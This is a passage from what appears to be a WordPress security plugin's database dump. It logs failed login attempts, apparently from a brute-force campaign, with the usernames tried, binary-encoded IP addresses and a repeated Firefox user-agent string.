Firefox/62.0'),(179,305,1624453000.084552,1,'loginFailInvalidUsername','adminea',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(180,307,1624453295.484177,1,'loginFailInvalidUsername','stephen',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(181,307,1624453295.501547,1,'loginFailInvalidUsername','stephen',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(182,308,1624453355.171163,1,'loginFailInvalidUsername','elementor',0,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(183,309,1624453495.238195,1,'loginFailInvalidUsername','wmbadmin',0,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(184,310,1624453583.792635,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(185,328,1624455645.295812,1,'loginFailInvalidUsername','pepe',0,'\0\0\0\0\0\0\0\0\0\0���G�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(186,329,1624455829.905493,1,'loginFailInvalidUsername','mariana',0,'\0\0\0\0\0\0\0\0\0\0����� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(187,331,1624456338.593034,1,'loginFailInvalidUsername','facolony',0,'\0\0\0\0\0\0\0\0\0\0��_�E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(188,332,1624456646.660043,1,'loginFailInvalidUsername','badmin',0,'\0\0\0\0\0\0\0\0\0\0����w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(189,336,1624457226.900272,1,'loginFailInvalidUsername','vektor',0,'\0\0\0\0\0\0\0\0\0\0��’)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(190,338,1624457444.561789,1,'loginFailInvalidUsername','dominik',0,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(191,340,1624457745.409957,1,'loginFailInvalidUsername','minhthu',0,'\0\0\0\0\0\0\0\0\0\0��\r~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(192,359,1624460908.765511,1,'loginFailInvalidUsername','badmin',0,'\0\0\0\0\0\0\0\0\0\0��’)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(193,360,1624460964.489947,1,'loginFailInvalidUsername','itadmin',0,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(194,361,1624461277.460764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���E4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(195,362,1624461313.442149,1,'loginFailInvalidUsername','jslms_instructor4',0,'\0\0\0\0\0\0\0\0\0\0��N/u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(196,363,1624461496.260634,1,'loginFailInvalidUsername','yejun',0,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(197,366,1624462304.877027,1,'loginFailInvalidUsername','guest',0,'\0\0\0\0\0\0\0\0\0\0��co�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(198,368,1624462454.511369,1,'loginFailInvalidUsername','adminuser',0,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(199,373,1624463095.193212,1,'loginFailInvalidUsername','koushki',0,'\0\0\0\0\0\0\0\0\0\0��.e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(200,374,1624463246.875949,1,'loginFailInvalidUsername','contributor',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(201,377,1624463496.966728,1,'loginFailInvalidUsername','adminea',0,'\0\0\0\0\0\0\0\0\0\0��’)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(202,378,1624463936.334554,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(203,378,1624463936.379046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(204,381,1624464386.239369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(205,382,1624464469.148799,1,'loginFailInvalidUsername','itadmin',0,'\0\0\0\0\0\0\0\0\0\0����ɢ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(206,389,1624465398.491080,1,'loginFailInvalidUsername','pouya',0,'\0\0\0\0\0\0\0\0\0\0��\rCrc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(207,391,1624465714.393340,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0����(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(208,395,1624466265.943051,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��o��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(209,395,1624466265.983806,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��o��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(210,397,1624466475.852973,1,'loginFailInvalidUsername','lgonzalez',0,'\0\0\0\0\0\0\0\0\0\0��F#ŕ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(211,399,1624466847.101884,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(212,399,1624466847.145108,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(213,405,1624467517.101284,1,'loginFailInvalidUsername','aa',0,'\0\0\0\0\0\0\0\0\0\0��V?F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(214,406,1624468057.822287,1,'loginFailInvalidUsername','recode',0,'\0\0\0\0\0\0\0\0\0\0����\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(215,408,1624468286.181082,1,'loginFailInvalidUsername','wmbadmin',0,'\0\0\0\0\0\0\0\0\0\0����u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(216,409,1624468359.859698,1,'loginFailInvalidUsername','webadmin',0,'\0\0\0\0\0\0\0\0\0\0���ɷC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(217,412,1624468645.645136,1,'loginFailInvalidUsername','test3',0,'\0\0\0\0\0\0\0\0\0\0���X�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(218,414,1624468876.770949,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0��2ta3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(219,421,1624469454.972553,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(220,427,1624470716.671863,1,'loginFailInvalidUsername','admina',0,'\0\0\0\0\0\0\0\0\0\0��\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(221,428,1624470796.709055,1,'loginFailInvalidUsername','shensihan',0,'\0\0\0\0\0\0\0\0\0\0��\'a�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(222,434,1624471656.821608,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(223,434,1624471656.829532,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(224,436,1624471877.825575,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��^2\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(225,440,1624472406.873811,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(226,441,1624472475.789193,1,'loginFailInvalidUsername','admina',0,'\0\0\0\0\0\0\0\0\0\0����f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(227,442,1624472518.260958,1,'loginFailInvalidUsername','phananlam',0,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(228,447,1624473155.861595,1,'loginFailInvalidUsername','thomas',0,'\0\0\0\0\0\0\0\0\0\0���ń�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(229,447,1624473155.896661,1,'loginFailInvalidUsername','thomas',0,'\0\0\0\0\0\0\0\0\0\0���ń�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(230,448,1624473255.032191,1,'loginFailInvalidUsername','webadmin',0,'\0\0\0\0\0\0\0\0\0\0����`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(231,456,1624474085.324856,1,'loginFailInvalidUsername','webadmin',0,'\0\0\0\0\0\0\0\0\0\0���H�]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(232,463,1624474908.773998,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(233,464,1624474961.150200,1,'loginFailInvalidUsername','webadmin',0,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(234,465,1624475060.452113,1,'loginFailInvalidUsername','clearsense',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(235,466,1624475265.224211,1,'loginFailInvalidUsername','adminuser',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(236,467,1624475348.823154,1,'loginFailInvalidUsername','testing123',0,'\0\0\0\0\0\0\0\0\0\0���0Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(237,468,1624475407.127857,1,'loginFailInvalidUsername','visor',0,'\0\0\0\0\0\0\0\0\0\0����(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(238,469,1624475545.671965,1,'loginFailInvalidUsername','wmbadmin',0,'\0\0\0\0\0\0\0\0\0\0��\rCrc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(239,470,1624475603.945824,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0�����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(240,470,1624475603.996564,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0�����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(241,477,1624477186.447772,1,'loginFailInvalidUsername','seotools2',0,'\0\0\0\0\0\0\0\0\0\0����\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(242,479,1624477325.294390,1,'loginFailInvalidUsername','r',0,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(243,480,1624477569.261951,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(244,482,1624478009.149990,1,'loginFailInvalidUsername','alexandrawcm',0,'\0\0\0\0\0\0\0\0\0\0��-7<n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(245,484,1624478630.092435,1,'loginFailInvalidUsername','cmsadmin',0,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(246,485,1624478661.166537,1,'loginFailInvalidUsername','fred',0,'\0\0\0\0\0\0\0\0\0\0���H�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(247,486,1624478737.009071,1,'loginFailInvalidUsername','cmsadmin',0,'\0\0\0\0\0\0\0\0\0\0��_�E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(248,488,1624479107.560960,1,'loginFailInvalidUsername','adminea',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(249,489,1624479249.140644,1,'loginFailInvalidUsername','webadmin',0,'\0\0\0\0\0\0\0\0\0\0��V?F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(250,490,1624479325.764743,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H@a','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(251,493,1624479546.782036,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(252,494,1624479628.420791,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(253,500,1624480479.855208,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(254,504,1624481017.438291,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(255,505,1624481257.993487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(256,505,1624481258.038318,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(257,513,1624483207.474061,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(258,518,1624484035.792098,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(259,524,1624484616.576746,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(260,526,1624485210.759916,1,'loginFailInvalidUsername','webadmin',0,'\0\0\0\0\0\0\0\0\0\0��2ta3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(261,528,1624485447.075427,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\\z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(262,528,1624485447.099391,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\\z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(263,529,1624485666.473358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(264,531,1624485828.005648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(265,532,1624486047.401488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(266,534,1624486270.258137,1,'loginFailInvalidUsername','itadmin',0,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(267,537,1624486556.081074,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ɢ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(268,538,1624486780.488554,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���#m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(269,539,1624486957.254937,1,'loginFailInvalidUsername','cmsadmin',0,'\0\0\0\0\0\0\0\0\0\0��vF4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(270,540,1624487058.877724,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%:0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(271,542,1624487307.027581,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(272,543,1624487386.707922,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(273,544,1624487665.671995,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(274,548,1624488195.782559,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(275,551,1624488739.743127,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(276,552,1624488810.255776,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(277,555,1624489486.117490,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xc�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(278,557,1624489796.623835,1,'loginFailInvalidUsername','tempadmin',0,'\0\0\0\0\0\0\0\0\0\0���_l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(279,558,1624490097.438481,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(280,559,1624490309.821517,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��\rCrc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(281,560,1624490312.426380,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(282,562,1624490488.885283,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��co�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(283,572,1624491646.481800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��co�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(284,572,1624491646.525486,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��co�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(285,574,1624492258.985648,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(286,576,1624492386.921201,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��.e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(287,577,1624492806.575434,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��ν!�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(288,580,1624493327.459213,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��\rCrc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(289,581,1624493427.993310,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(290,581,1624493428.013311,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(291,582,1624493748.782868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(292,584,1624493907.281377,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(293,589,1624494976.404291,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(294,589,1624494976.439323,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(295,590,1624495146.335312,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N/u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(296,594,1624495998.584466,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>m	y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(297,596,1624496315.694976,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(298,597,1624496368.318477,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N/u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(299,598,1624496467.385897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��V?F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(300,599,1624496707.915125,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��’)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(301,602,1624496937.907131,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(302,603,1624497328.915265,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(303,605,1624497558.181595,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��F#ŕ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(304,606,1624497614.253600,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(305,607,1624497796.969780,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���c?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(306,611,1624498348.463528,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��3Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(307,612,1624498668.360481,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(308,617,1624499379.660198,1,'loginFailInvalidUsername','wp-sys-admin',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(309,618,1624499518.474924,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 